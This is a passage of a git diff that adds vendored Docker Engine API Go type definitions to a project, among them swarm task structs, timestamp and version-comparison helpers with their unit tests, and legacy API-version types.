+ LogDriver *Driver `json:",omitempty"` + + // ForceUpdate is a counter that triggers an update even if no relevant + // parameters have been changed. + ForceUpdate uint64 +} + +// Resources represents resources (CPU/Memory). +type Resources struct { + NanoCPUs int64 `json:",omitempty"` + MemoryBytes int64 `json:",omitempty"` +} + +// ResourceRequirements represents resources requirements. +type ResourceRequirements struct { + Limits *Resources `json:",omitempty"` + Reservations *Resources `json:",omitempty"` +} + +// Placement represents orchestration parameters. +type Placement struct { + Constraints []string `json:",omitempty"` +} + +// RestartPolicy represents the restart policy. +type RestartPolicy struct { + Condition RestartPolicyCondition `json:",omitempty"` + Delay *time.Duration `json:",omitempty"` + MaxAttempts *uint64 `json:",omitempty"` + Window *time.Duration `json:",omitempty"` +} + +// RestartPolicyCondition represents when to restart. +type RestartPolicyCondition string + +const ( + // RestartPolicyConditionNone NONE + RestartPolicyConditionNone RestartPolicyCondition = "none" + // RestartPolicyConditionOnFailure ON_FAILURE + RestartPolicyConditionOnFailure RestartPolicyCondition = "on-failure" + // RestartPolicyConditionAny ANY + RestartPolicyConditionAny RestartPolicyCondition = "any" +) + +// TaskStatus represents the status of a task. +type TaskStatus struct { + Timestamp time.Time `json:",omitempty"` + State TaskState `json:",omitempty"` + Message string `json:",omitempty"` + Err string `json:",omitempty"` + ContainerStatus ContainerStatus `json:",omitempty"` + PortStatus PortStatus `json:",omitempty"` +} + +// ContainerStatus represents the status of a container. 
+type ContainerStatus struct { + ContainerID string `json:",omitempty"` + PID int `json:",omitempty"` + ExitCode int `json:",omitempty"` +} + +// PortStatus represents the port status of a task's host ports whose +// service has published host ports +type PortStatus struct { + Ports []PortConfig `json:",omitempty"` +} diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert.go b/vendor/github.com/docker/docker/api/types/time/duration_convert.go new file mode 100644 index 0000000000..63e1eec19e --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/duration_convert.go @@ -0,0 +1,12 @@ +package time + +import ( + "strconv" + "time" +) + +// DurationToSecondsString converts the specified duration to the number +// seconds it represents, formatted as a string. +func DurationToSecondsString(duration time.Duration) string { + return strconv.FormatFloat(duration.Seconds(), 'f', 0, 64) +} diff --git a/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go new file mode 100644 index 0000000000..869c08f863 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/duration_convert_test.go @@ -0,0 +1,26 @@ +package time + +import ( + "testing" + "time" +) + +func TestDurationToSecondsString(t *testing.T) { + cases := []struct { + in time.Duration + expected string + }{ + {0 * time.Second, "0"}, + {1 * time.Second, "1"}, + {1 * time.Minute, "60"}, + {24 * time.Hour, "86400"}, + } + + for _, c := range cases { + s := DurationToSecondsString(c.in) + if s != c.expected { + t.Errorf("wrong value for input `%v`: expected `%s`, got `%s`", c.in, c.expected, s) + t.Fail() + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp.go b/vendor/github.com/docker/docker/api/types/time/timestamp.go new file mode 100644 index 0000000000..d3695ba723 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/timestamp.go @@ -0,0 
+1,124 @@ +package time + +import ( + "fmt" + "math" + "strconv" + "strings" + "time" +) + +// These are additional predefined layouts for use in Time.Format and Time.Parse +// with --since and --until parameters for `docker logs` and `docker events` +const ( + rFC3339Local = "2006-01-02T15:04:05" // RFC3339 with local timezone + rFC3339NanoLocal = "2006-01-02T15:04:05.999999999" // RFC3339Nano with local timezone + dateWithZone = "2006-01-02Z07:00" // RFC3339 with time at 00:00:00 + dateLocal = "2006-01-02" // RFC3339 with local timezone and time at 00:00:00 +) + +// GetTimestamp tries to parse given string as golang duration, +// then RFC3339 time and finally as a Unix timestamp. If +// any of these were successful, it returns a Unix timestamp +// as string otherwise returns the given value back. +// In case of duration input, the returned timestamp is computed +// as the given reference time minus the amount of the duration. +func GetTimestamp(value string, reference time.Time) (string, error) { + if d, err := time.ParseDuration(value); value != "0" && err == nil { + return strconv.FormatInt(reference.Add(-d).Unix(), 10), nil + } + + var format string + var parseInLocation bool + + // if the string has a Z or a + or three dashes use parse otherwise use parseinlocation + parseInLocation = !(strings.ContainsAny(value, "zZ+") || strings.Count(value, "-") == 3) + + if strings.Contains(value, ".") { + if parseInLocation { + format = rFC3339NanoLocal + } else { + format = time.RFC3339Nano + } + } else if strings.Contains(value, "T") { + // we want the number of colons in the T portion of the timestamp + tcolons := strings.Count(value, ":") + // if parseInLocation is off and we have a +/- zone offset (not Z) then + // there will be an extra colon in the input for the tz offset subtract that + // colon from the tcolons count + if !parseInLocation && !strings.ContainsAny(value, "zZ") && tcolons > 0 { + tcolons-- + } + if parseInLocation { + switch tcolons { + case 0: + 
format = "2006-01-02T15" + case 1: + format = "2006-01-02T15:04" + default: + format = rFC3339Local + } + } else { + switch tcolons { + case 0: + format = "2006-01-02T15Z07:00" + case 1: + format = "2006-01-02T15:04Z07:00" + default: + format = time.RFC3339 + } + } + } else if parseInLocation { + format = dateLocal + } else { + format = dateWithZone + } + + var t time.Time + var err error + + if parseInLocation { + t, err = time.ParseInLocation(format, value, time.FixedZone(reference.Zone())) + } else { + t, err = time.Parse(format, value) + } + + if err != nil { + // if there is a `-` then its an RFC3339 like timestamp otherwise assume unixtimestamp + if strings.Contains(value, "-") { + return "", err // was probably an RFC3339 like timestamp but the parser failed with an error + } + return value, nil // unixtimestamp in and out case (meaning: the value passed at the command line is already in the right format for passing to the server) + } + + return fmt.Sprintf("%d.%09d", t.Unix(), int64(t.Nanosecond())), nil +} + +// ParseTimestamps returns seconds and nanoseconds from a timestamp that has the +// format "%d.%09d", time.Unix(), int64(time.Nanosecond())) +// if the incoming nanosecond portion is longer or shorter than 9 digits it is +// converted to nanoseconds. The expectation is that the seconds and +// seconds will be used to create a time variable. 
For example: +// seconds, nanoseconds, err := ParseTimestamp("1136073600.000000001",0) +// if err == nil since := time.Unix(seconds, nanoseconds) +// returns seconds as def(aultSeconds) if value == "" +func ParseTimestamps(value string, def int64) (int64, int64, error) { + if value == "" { + return def, 0, nil + } + sa := strings.SplitN(value, ".", 2) + s, err := strconv.ParseInt(sa[0], 10, 64) + if err != nil { + return s, 0, err + } + if len(sa) != 2 { + return s, 0, nil + } + n, err := strconv.ParseInt(sa[1], 10, 64) + if err != nil { + return s, n, err + } + // should already be in nanoseconds but just in case convert n to nanoseonds + n = int64(float64(n) * math.Pow(float64(10), float64(9-len(sa[1])))) + return s, n, nil +} diff --git a/vendor/github.com/docker/docker/api/types/time/timestamp_test.go b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go new file mode 100644 index 0000000000..a1651309d7 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/time/timestamp_test.go @@ -0,0 +1,93 @@ +package time + +import ( + "fmt" + "testing" + "time" +) + +func TestGetTimestamp(t *testing.T) { + now := time.Now().In(time.UTC) + cases := []struct { + in, expected string + expectedErr bool + }{ + // Partial RFC3339 strings get parsed with second precision + {"2006-01-02T15:04:05.999999999+07:00", "1136189045.999999999", false}, + {"2006-01-02T15:04:05.999999999Z", "1136214245.999999999", false}, + {"2006-01-02T15:04:05.999999999", "1136214245.999999999", false}, + {"2006-01-02T15:04:05Z", "1136214245.000000000", false}, + {"2006-01-02T15:04:05", "1136214245.000000000", false}, + {"2006-01-02T15:04:0Z", "", true}, + {"2006-01-02T15:04:0", "", true}, + {"2006-01-02T15:04Z", "1136214240.000000000", false}, + {"2006-01-02T15:04+00:00", "1136214240.000000000", false}, + {"2006-01-02T15:04-00:00", "1136214240.000000000", false}, + {"2006-01-02T15:04", "1136214240.000000000", false}, + {"2006-01-02T15:0Z", "", true}, + {"2006-01-02T15:0", "", true}, 
+ {"2006-01-02T15Z", "1136214000.000000000", false}, + {"2006-01-02T15+00:00", "1136214000.000000000", false}, + {"2006-01-02T15-00:00", "1136214000.000000000", false}, + {"2006-01-02T15", "1136214000.000000000", false}, + {"2006-01-02T1Z", "1136163600.000000000", false}, + {"2006-01-02T1", "1136163600.000000000", false}, + {"2006-01-02TZ", "", true}, + {"2006-01-02T", "", true}, + {"2006-01-02+00:00", "1136160000.000000000", false}, + {"2006-01-02-00:00", "1136160000.000000000", false}, + {"2006-01-02-00:01", "1136160060.000000000", false}, + {"2006-01-02Z", "1136160000.000000000", false}, + {"2006-01-02", "1136160000.000000000", false}, + {"2015-05-13T20:39:09Z", "1431549549.000000000", false}, + + // unix timestamps returned as is + {"1136073600", "1136073600", false}, + {"1136073600.000000001", "1136073600.000000001", false}, + // Durations + {"1m", fmt.Sprintf("%d", now.Add(-1*time.Minute).Unix()), false}, + {"1.5h", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false}, + {"1h30m", fmt.Sprintf("%d", now.Add(-90*time.Minute).Unix()), false}, + + // String fallback + {"invalid", "invalid", false}, + } + + for _, c := range cases { + o, err := GetTimestamp(c.in, now) + if o != c.expected || + (err == nil && c.expectedErr) || + (err != nil && !c.expectedErr) { + t.Errorf("wrong value for '%s'. 
expected:'%s' got:'%s' with error: `%s`", c.in, c.expected, o, err) + t.Fail() + } + } +} + +func TestParseTimestamps(t *testing.T) { + cases := []struct { + in string + def, expectedS, expectedN int64 + expectedErr bool + }{ + // unix timestamps + {"1136073600", 0, 1136073600, 0, false}, + {"1136073600.000000001", 0, 1136073600, 1, false}, + {"1136073600.0000000010", 0, 1136073600, 1, false}, + {"1136073600.00000001", 0, 1136073600, 10, false}, + {"foo.bar", 0, 0, 0, true}, + {"1136073600.bar", 0, 1136073600, 0, true}, + {"", -1, -1, 0, false}, + } + + for _, c := range cases { + s, n, err := ParseTimestamps(c.in, c.def) + if s != c.expectedS || + n != c.expectedN || + (err == nil && c.expectedErr) || + (err != nil && !c.expectedErr) { + t.Errorf("wrong values for input `%s` with default `%d` expected:'%d'seconds and `%d`nanosecond got:'%d'seconds and `%d`nanoseconds with error: `%s`", c.in, c.def, c.expectedS, c.expectedN, s, n, err) + t.Fail() + } + } +} diff --git a/vendor/github.com/docker/docker/api/types/types.go b/vendor/github.com/docker/docker/api/types/types.go new file mode 100644 index 0000000000..a82c3e88ef --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/types.go @@ -0,0 +1,549 @@ +package types + +import ( + "errors" + "fmt" + "io" + "os" + "strings" + "time" + + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/filters" + "github.com/docker/docker/api/types/mount" + "github.com/docker/docker/api/types/network" + "github.com/docker/docker/api/types/registry" + "github.com/docker/docker/api/types/swarm" + "github.com/docker/go-connections/nat" +) + +// ContainerChange contains response of Engine API: +// GET "/containers/{name:.*}/changes" +type ContainerChange struct { + Kind int + Path string +} + +// ImageHistory contains response of Engine API: +// GET "/images/{name:.*}/history" +type ImageHistory struct { + ID string `json:"Id"` + Created int64 + CreatedBy string + Tags []string + Size int64 + 
Comment string +} + +// ImageDelete contains response of Engine API: +// DELETE "/images/{name:.*}" +type ImageDelete struct { + Untagged string `json:",omitempty"` + Deleted string `json:",omitempty"` +} + +// GraphDriverData returns Image's graph driver config info +// when calling inspect command +type GraphDriverData struct { + Name string + Data map[string]string +} + +// RootFS returns Image's RootFS description including the layer IDs. +type RootFS struct { + Type string + Layers []string `json:",omitempty"` + BaseLayer string `json:",omitempty"` +} + +// ImageInspect contains response of Engine API: +// GET "/images/{name:.*}/json" +type ImageInspect struct { + ID string `json:"Id"` + RepoTags []string + RepoDigests []string + Parent string + Comment string + Created string + Container string + ContainerConfig *container.Config + DockerVersion string + Author string + Config *container.Config + Architecture string + Os string + OsVersion string `json:",omitempty"` + Size int64 + VirtualSize int64 + GraphDriver GraphDriverData + RootFS RootFS +} + +// Container contains response of Engine API: +// GET "/containers/json" +type Container struct { + ID string `json:"Id"` + Names []string + Image string + ImageID string + Command string + Created int64 + Ports []Port + SizeRw int64 `json:",omitempty"` + SizeRootFs int64 `json:",omitempty"` + Labels map[string]string + State string + Status string + HostConfig struct { + NetworkMode string `json:",omitempty"` + } + NetworkSettings *SummaryNetworkSettings + Mounts []MountPoint +} + +// CopyConfig contains request body of Engine API: +// POST "/containers/"+containerID+"/copy" +type CopyConfig struct { + Resource string +} + +// ContainerPathStat is used to encode the header from +// GET "/containers/{name:.*}/archive" +// "Name" is the file or directory name. 
+type ContainerPathStat struct { + Name string `json:"name"` + Size int64 `json:"size"` + Mode os.FileMode `json:"mode"` + Mtime time.Time `json:"mtime"` + LinkTarget string `json:"linkTarget"` +} + +// ContainerStats contains response of Engine API: +// GET "/stats" +type ContainerStats struct { + Body io.ReadCloser `json:"body"` + OSType string `json:"ostype"` +} + +// ContainerProcessList contains response of Engine API: +// GET "/containers/{name:.*}/top" +type ContainerProcessList struct { + Processes [][]string + Titles []string +} + +// Ping contains response of Engine API: +// GET "/_ping" +type Ping struct { + APIVersion string + Experimental bool +} + +// Version contains response of Engine API: +// GET "/version" +type Version struct { + Version string + APIVersion string `json:"ApiVersion"` + MinAPIVersion string `json:"MinAPIVersion,omitempty"` + GitCommit string + GoVersion string + Os string + Arch string + KernelVersion string `json:",omitempty"` + Experimental bool `json:",omitempty"` + BuildTime string `json:",omitempty"` +} + +// Commit records a external tool actual commit id version along the +// one expect by dockerd as set at build time +type Commit struct { + ID string + Expected string +} + +// Info contains response of Engine API: +// GET "/info" +type Info struct { + ID string + Containers int + ContainersRunning int + ContainersPaused int + ContainersStopped int + Images int + Driver string + DriverStatus [][2]string + SystemStatus [][2]string + Plugins PluginsInfo + MemoryLimit bool + SwapLimit bool + KernelMemory bool + CPUCfsPeriod bool `json:"CpuCfsPeriod"` + CPUCfsQuota bool `json:"CpuCfsQuota"` + CPUShares bool + CPUSet bool + IPv4Forwarding bool + BridgeNfIptables bool + BridgeNfIP6tables bool `json:"BridgeNfIp6tables"` + Debug bool + NFd int + OomKillDisable bool + NGoroutines int + SystemTime string + LoggingDriver string + CgroupDriver string + NEventsListener int + KernelVersion string + OperatingSystem string + OSType string 
+ Architecture string + IndexServerAddress string + RegistryConfig *registry.ServiceConfig + NCPU int + MemTotal int64 + DockerRootDir string + HTTPProxy string `json:"HttpProxy"` + HTTPSProxy string `json:"HttpsProxy"` + NoProxy string + Name string + Labels []string + ExperimentalBuild bool + ServerVersion string + ClusterStore string + ClusterAdvertise string + Runtimes map[string]Runtime + DefaultRuntime string + Swarm swarm.Info + // LiveRestoreEnabled determines whether containers should be kept + // running when the daemon is shutdown or upon daemon start if + // running containers are detected + LiveRestoreEnabled bool + Isolation container.Isolation + InitBinary string + ContainerdCommit Commit + RuncCommit Commit + InitCommit Commit + SecurityOptions []string +} + +// KeyValue holds a key/value pair +type KeyValue struct { + Key, Value string +} + +// SecurityOpt contains the name and options of a security option +type SecurityOpt struct { + Name string + Options []KeyValue +} + +// DecodeSecurityOptions decodes a security options string slice to a type safe +// SecurityOpt +func DecodeSecurityOptions(opts []string) ([]SecurityOpt, error) { + so := []SecurityOpt{} + for _, opt := range opts { + // support output from a < 1.13 docker daemon + if !strings.Contains(opt, "=") { + so = append(so, SecurityOpt{Name: opt}) + continue + } + secopt := SecurityOpt{} + split := strings.Split(opt, ",") + for _, s := range split { + kv := strings.SplitN(s, "=", 2) + if len(kv) != 2 { + return nil, fmt.Errorf("invalid security option %q", s) + } + if kv[0] == "" || kv[1] == "" { + return nil, errors.New("invalid empty security option") + } + if kv[0] == "name" { + secopt.Name = kv[1] + continue + } + secopt.Options = append(secopt.Options, KeyValue{Key: kv[0], Value: kv[1]}) + } + so = append(so, secopt) + } + return so, nil +} + +// PluginsInfo is a temp struct holding Plugins name +// registered with docker daemon. 
It is used by Info struct +type PluginsInfo struct { + // List of Volume plugins registered + Volume []string + // List of Network plugins registered + Network []string + // List of Authorization plugins registered + Authorization []string +} + +// ExecStartCheck is a temp struct used by execStart +// Config fields is part of ExecConfig in runconfig package +type ExecStartCheck struct { + // ExecStart will first check if it's detached + Detach bool + // Check if there's a tty + Tty bool +} + +// HealthcheckResult stores information about a single run of a healthcheck probe +type HealthcheckResult struct { + Start time.Time // Start is the time this check started + End time.Time // End is the time this check ended + ExitCode int // ExitCode meanings: 0=healthy, 1=unhealthy, 2=reserved (considered unhealthy), else=error running probe + Output string // Output from last check +} + +// Health states +const ( + NoHealthcheck = "none" // Indicates there is no healthcheck + Starting = "starting" // Starting indicates that the container is not yet ready + Healthy = "healthy" // Healthy indicates that the container is running correctly + Unhealthy = "unhealthy" // Unhealthy indicates that the container has a problem +) + +// Health stores information about the container's healthcheck results +type Health struct { + Status string // Status is one of Starting, Healthy or Unhealthy + FailingStreak int // FailingStreak is the number of consecutive failures + Log []*HealthcheckResult // Log contains the last few results (oldest first) +} + +// ContainerState stores container's running state +// it's part of ContainerJSONBase and will return by "inspect" command +type ContainerState struct { + Status string + Running bool + Paused bool + Restarting bool + OOMKilled bool + Dead bool + Pid int + ExitCode int + Error string + StartedAt string + FinishedAt string + Health *Health `json:",omitempty"` +} + +// ContainerNode stores information about the node that a container +// is 
running on. It's only available in Docker Swarm +type ContainerNode struct { + ID string + IPAddress string `json:"IP"` + Addr string + Name string + Cpus int + Memory int64 + Labels map[string]string +} + +// ContainerJSONBase contains response of Engine API: +// GET "/containers/{name:.*}/json" +type ContainerJSONBase struct { + ID string `json:"Id"` + Created string + Path string + Args []string + State *ContainerState + Image string + ResolvConfPath string + HostnamePath string + HostsPath string + LogPath string + Node *ContainerNode `json:",omitempty"` + Name string + RestartCount int + Driver string + MountLabel string + ProcessLabel string + AppArmorProfile string + ExecIDs []string + HostConfig *container.HostConfig + GraphDriver GraphDriverData + SizeRw *int64 `json:",omitempty"` + SizeRootFs *int64 `json:",omitempty"` +} + +// ContainerJSON is newly used struct along with MountPoint +type ContainerJSON struct { + *ContainerJSONBase + Mounts []MountPoint + Config *container.Config + NetworkSettings *NetworkSettings +} + +// NetworkSettings exposes the network settings in the api +type NetworkSettings struct { + NetworkSettingsBase + DefaultNetworkSettings + Networks map[string]*network.EndpointSettings +} + +// SummaryNetworkSettings provides a summary of container's networks +// in /containers/json +type SummaryNetworkSettings struct { + Networks map[string]*network.EndpointSettings +} + +// NetworkSettingsBase holds basic information about networks +type NetworkSettingsBase struct { + Bridge string // Bridge is the Bridge name the network uses(e.g. 
`docker0`) + SandboxID string // SandboxID uniquely represents a container's network stack + HairpinMode bool // HairpinMode specifies if hairpin NAT should be enabled on the virtual interface + LinkLocalIPv6Address string // LinkLocalIPv6Address is an IPv6 unicast address using the link-local prefix + LinkLocalIPv6PrefixLen int // LinkLocalIPv6PrefixLen is the prefix length of an IPv6 unicast address + Ports nat.PortMap // Ports is a collection of PortBinding indexed by Port + SandboxKey string // SandboxKey identifies the sandbox + SecondaryIPAddresses []network.Address + SecondaryIPv6Addresses []network.Address +} + +// DefaultNetworkSettings holds network information +// during the 2 release deprecation period. +// It will be removed in Docker 1.11. +type DefaultNetworkSettings struct { + EndpointID string // EndpointID uniquely represents a service endpoint in a Sandbox + Gateway string // Gateway holds the gateway address for the network + GlobalIPv6Address string // GlobalIPv6Address holds network's global IPv6 address + GlobalIPv6PrefixLen int // GlobalIPv6PrefixLen represents mask length of network's global IPv6 address + IPAddress string // IPAddress holds the IPv4 address for the network + IPPrefixLen int // IPPrefixLen represents mask length of network's IPv4 address + IPv6Gateway string // IPv6Gateway holds gateway address specific for IPv6 + MacAddress string // MacAddress holds the MAC address for the network +} + +// MountPoint represents a mount point configuration inside the container. +// This is used for reporting the mountpoints in use by a container. 
+type MountPoint struct { + Type mount.Type `json:",omitempty"` + Name string `json:",omitempty"` + Source string + Destination string + Driver string `json:",omitempty"` + Mode string + RW bool + Propagation mount.Propagation +} + +// NetworkResource is the body of the "get network" http response message +type NetworkResource struct { + Name string // Name is the requested name of the network + ID string `json:"Id"` // ID uniquely identifies a network on a single machine + Created time.Time // Created is the time the network created + Scope string // Scope describes the level at which the network exists (e.g. `global` for cluster-wide or `local` for machine level) + Driver string // Driver is the Driver name used to create the network (e.g. `bridge`, `overlay`) + EnableIPv6 bool // EnableIPv6 represents whether to enable IPv6 + IPAM network.IPAM // IPAM is the network's IP Address Management + Internal bool // Internal represents if the network is used internal only + Attachable bool // Attachable represents if the global scope is manually attachable by regular containers from workers in swarm mode. 
+ Containers map[string]EndpointResource // Containers contains endpoints belonging to the network + Options map[string]string // Options holds the network specific options to use for when creating the network + Labels map[string]string // Labels holds metadata specific to the network being created + Peers []network.PeerInfo `json:",omitempty"` // List of peer nodes for an overlay network +} + +// EndpointResource contains network resources allocated and used for a container in a network +type EndpointResource struct { + Name string + EndpointID string + MacAddress string + IPv4Address string + IPv6Address string +} + +// NetworkCreate is the expected body of the "create network" http request message +type NetworkCreate struct { + CheckDuplicate bool + Driver string + EnableIPv6 bool + IPAM *network.IPAM + Internal bool + Attachable bool + Options map[string]string + Labels map[string]string +} + +// NetworkCreateRequest is the request message sent to the server for network create call. 
+type NetworkCreateRequest struct { + NetworkCreate + Name string +} + +// NetworkCreateResponse is the response message sent by the server for network create call +type NetworkCreateResponse struct { + ID string `json:"Id"` + Warning string +} + +// NetworkConnect represents the data to be used to connect a container to the network +type NetworkConnect struct { + Container string + EndpointConfig *network.EndpointSettings `json:",omitempty"` +} + +// NetworkDisconnect represents the data to be used to disconnect a container from the network +type NetworkDisconnect struct { + Container string + Force bool +} + +// Checkpoint represents the details of a checkpoint +type Checkpoint struct { + Name string // Name is the name of the checkpoint +} + +// Runtime describes an OCI runtime +type Runtime struct { + Path string `json:"path"` + Args []string `json:"runtimeArgs,omitempty"` +} + +// DiskUsage contains response of Engine API: +// GET "/system/df" +type DiskUsage struct { + LayersSize int64 + Images []*ImageSummary + Containers []*Container + Volumes []*Volume +} + +// ContainersPruneReport contains the response for Engine API: +// POST "/containers/prune" +type ContainersPruneReport struct { + ContainersDeleted []string + SpaceReclaimed uint64 +} + +// VolumesPruneReport contains the response for Engine API: +// POST "/volumes/prune" +type VolumesPruneReport struct { + VolumesDeleted []string + SpaceReclaimed uint64 +} + +// ImagesPruneReport contains the response for Engine API: +// POST "/images/prune" +type ImagesPruneReport struct { + ImagesDeleted []ImageDelete + SpaceReclaimed uint64 +} + +// NetworksPruneReport contains the response for Engine API: +// POST "/networks/prune" +type NetworksPruneReport struct { + NetworksDeleted []string +} + +// SecretCreateResponse contains the information returned to a client +// on the creation of a new secret. +type SecretCreateResponse struct { + // ID is the id of the created secret. 
+ ID string +} + +// SecretListOptions holds parameters to list secrets +type SecretListOptions struct { + Filters filters.Args +} diff --git a/vendor/github.com/docker/docker/api/types/versions/README.md b/vendor/github.com/docker/docker/api/types/versions/README.md new file mode 100644 index 0000000000..cdac50a53c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/README.md @@ -0,0 +1,14 @@ +## Legacy API type versions + +This package includes types for legacy API versions. The stable version of the API types lives in `api/types/*.go`. + +Consider moving a type here when you need to keep backwards compatibility in the API. These legacy types are organized by the latest API version they appear in. For instance, types in the `v1p19` package are valid for API versions below or equal to `1.19`. Types in the `v1p20` package are valid for the API version `1.20`, since the versions below that will use the legacy types in `v1p19`. + +### Package name conventions + +The package name convention is to use `v` as a prefix for the version number and `p`(patch) as a separator. We use this nomenclature due to a few restrictions in the Go package name convention: + +1. We cannot use `.` because it's interpreted by the language, think of `v1.20.CallFunction`. +2. We cannot use `_` because golint complains about it. The code is actually valid, but it arguably looks weirder: `v1_20.CallFunction`. + +For instance, if you want to modify a type that was available in the version `1.21` of the API but it will have different fields in the version `1.22`, you want to create a new package under `api/types/versions/v1p21`. 
diff --git a/vendor/github.com/docker/docker/api/types/versions/compare.go b/vendor/github.com/docker/docker/api/types/versions/compare.go new file mode 100644 index 0000000000..611d4fed66 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/compare.go @@ -0,0 +1,62 @@ +package versions + +import ( + "strconv" + "strings" +) + +// compare compares two version strings +// returns -1 if v1 < v2, 1 if v1 > v2, 0 otherwise. +func compare(v1, v2 string) int { + var ( + currTab = strings.Split(v1, ".") + otherTab = strings.Split(v2, ".") + ) + + max := len(currTab) + if len(otherTab) > max { + max = len(otherTab) + } + for i := 0; i < max; i++ { + var currInt, otherInt int + + if len(currTab) > i { + currInt, _ = strconv.Atoi(currTab[i]) + } + if len(otherTab) > i { + otherInt, _ = strconv.Atoi(otherTab[i]) + } + if currInt > otherInt { + return 1 + } + if otherInt > currInt { + return -1 + } + } + return 0 +} + +// LessThan checks if a version is less than another +func LessThan(v, other string) bool { + return compare(v, other) == -1 +} + +// LessThanOrEqualTo checks if a version is less than or equal to another +func LessThanOrEqualTo(v, other string) bool { + return compare(v, other) <= 0 +} + +// GreaterThan checks if a version is greater than another +func GreaterThan(v, other string) bool { + return compare(v, other) == 1 +} + +// GreaterThanOrEqualTo checks if a version is greater than or equal to another +func GreaterThanOrEqualTo(v, other string) bool { + return compare(v, other) >= 0 +} + +// Equal checks if a version is equal to another +func Equal(v, other string) bool { + return compare(v, other) == 0 +} diff --git a/vendor/github.com/docker/docker/api/types/versions/compare_test.go b/vendor/github.com/docker/docker/api/types/versions/compare_test.go new file mode 100644 index 0000000000..c2b96869f7 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/compare_test.go @@ -0,0 +1,26 @@ +package versions + +import ( + 
"testing" +) + +func assertVersion(t *testing.T, a, b string, result int) { + if r := compare(a, b); r != result { + t.Fatalf("Unexpected version comparison result. Found %d, expected %d", r, result) + } +} + +func TestCompareVersion(t *testing.T) { + assertVersion(t, "1.12", "1.12", 0) + assertVersion(t, "1.0.0", "1", 0) + assertVersion(t, "1", "1.0.0", 0) + assertVersion(t, "1.05.00.0156", "1.0.221.9289", 1) + assertVersion(t, "1", "1.0.1", -1) + assertVersion(t, "1.0.1", "1", 1) + assertVersion(t, "1.0.1", "1.0.2", -1) + assertVersion(t, "1.0.2", "1.0.3", -1) + assertVersion(t, "1.0.3", "1.1", -1) + assertVersion(t, "1.1", "1.1.1", -1) + assertVersion(t, "1.1.1", "1.1.2", -1) + assertVersion(t, "1.1.2", "1.2", -1) +} diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go new file mode 100644 index 0000000000..dc13150545 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/v1p19/types.go @@ -0,0 +1,35 @@ +// Package v1p19 provides specific API types for the API version 1, patch 19. +package v1p19 + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/api/types/versions/v1p20" + "github.com/docker/go-connections/nat" +) + +// ContainerJSON is a backcompatibility struct for APIs prior to 1.20. +// Note this is not used by the Windows daemon. +type ContainerJSON struct { + *types.ContainerJSONBase + Volumes map[string]string + VolumesRW map[string]bool + Config *ContainerConfig + NetworkSettings *v1p20.NetworkSettings +} + +// ContainerConfig is a backcompatibility struct for APIs prior to 1.20. 
+type ContainerConfig struct { + *container.Config + + MacAddress string + NetworkDisabled bool + ExposedPorts map[nat.Port]struct{} + + // backward compatibility, they now live in HostConfig + VolumeDriver string + Memory int64 + MemorySwap int64 + CPUShares int64 `json:"CpuShares"` + CPUSet string `json:"Cpuset"` +} diff --git a/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go new file mode 100644 index 0000000000..94a06d7452 --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/versions/v1p20/types.go @@ -0,0 +1,40 @@ +// Package v1p20 provides specific API types for the API version 1, patch 20. +package v1p20 + +import ( + "github.com/docker/docker/api/types" + "github.com/docker/docker/api/types/container" + "github.com/docker/go-connections/nat" +) + +// ContainerJSON is a backcompatibility struct for the API 1.20 +type ContainerJSON struct { + *types.ContainerJSONBase + Mounts []types.MountPoint + Config *ContainerConfig + NetworkSettings *NetworkSettings +} + +// ContainerConfig is a backcompatibility struct used in ContainerJSON for the API 1.20 +type ContainerConfig struct { + *container.Config + + MacAddress string + NetworkDisabled bool + ExposedPorts map[nat.Port]struct{} + + // backward compatibility, they now live in HostConfig + VolumeDriver string +} + +// StatsJSON is a backcompatibility struct used in Stats for APIs prior to 1.21 +type StatsJSON struct { + types.Stats + Network types.NetworkStats `json:"network,omitempty"` +} + +// NetworkSettings is a backward compatible struct for APIs prior to 1.21 +type NetworkSettings struct { + types.NetworkSettingsBase + types.DefaultNetworkSettings +} diff --git a/vendor/github.com/docker/docker/api/types/volume.go b/vendor/github.com/docker/docker/api/types/volume.go new file mode 100644 index 0000000000..da4f8ebd9c --- /dev/null +++ b/vendor/github.com/docker/docker/api/types/volume.go @@ -0,0 +1,58 @@ +package 
types + +// This file was generated by the swagger tool. +// Editing this file might prove futile when you re-run the swagger generate command + +// Volume volume +// swagger:model Volume +type Volume struct { + + // Name of the volume driver used by the volume. + // Required: true + Driver string `json:"Driver"` + + // User-defined key/value metadata. + // Required: true + Labels map[string]string `json:"Labels"` + + // Mount path of the volume on the host. + // Required: true + Mountpoint string `json:"Mountpoint"` + + // Name of the volume. + // Required: true + Name string `json:"Name"` + + // The driver specific options used when creating the volume. + // Required: true + Options map[string]string `json:"Options"` + + // The level at which the volume exists. Either `global` for cluster-wide, or `local` for machine level. + // Required: true + Scope string `json:"Scope"` + + // Low-level details about the volume, provided by the volume driver. + // Details are returned as a map with key/value pairs: + // `{"key":"value","key2":"value2"}`. + // + // The `Status` field is optional, and is omitted if the volume driver + // does not support this feature. + // + Status map[string]interface{} `json:"Status,omitempty"` + + // usage data + UsageData *VolumeUsageData `json:"UsageData,omitempty"` +} + +// VolumeUsageData volume usage data +// swagger:model VolumeUsageData +type VolumeUsageData struct { + + // The number of containers referencing this volume. 
